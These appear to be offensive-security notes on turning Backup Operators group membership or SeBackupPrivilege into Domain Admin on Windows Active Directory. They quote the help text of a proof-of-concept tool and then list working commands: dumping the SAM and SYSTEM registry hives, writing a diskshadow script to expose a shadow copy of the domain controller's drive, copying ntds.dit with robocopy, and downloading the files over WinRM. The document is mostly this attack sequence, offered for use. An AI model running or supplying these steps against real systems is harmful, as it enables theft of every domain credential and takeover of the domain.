https://github.com/mpgn/BackupOperatorToDA
# If you compromise an account member of the group Backup Operators # you can become the Domain Admin without RDP or WinRM on the Domain Controller.# With this POC you don't need to have an access with WinRM or RPD :
.\BackupOperatorToDA.exe -h
Backup Operator to Domain Admin (by @mpgn_x64)
This tool exist thanks to @filip_dragovic / https://github.com/Wh04m1001
Mandatory argument:
-t <TARGET> \\computer_name (ex: \\dc01.pouldard.wizard
-o <PATH> Where to store the sam / system / security files (can be UNC path)
Optional arguments:
-u <USER> Username
-p <PASSWORD> Password
-d <DOMAIN> Domain
-h help
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
# Mainly using WinRM# On a workstationcd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
# On a DC (locally)
nano poc.dsh
set context persistent nowriters
add volume c: alias poc
create
expose %poc% z:
unix2dos poc.dsh
cd C:\Temp
upload poc.dsh
diskshadow /s poc.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system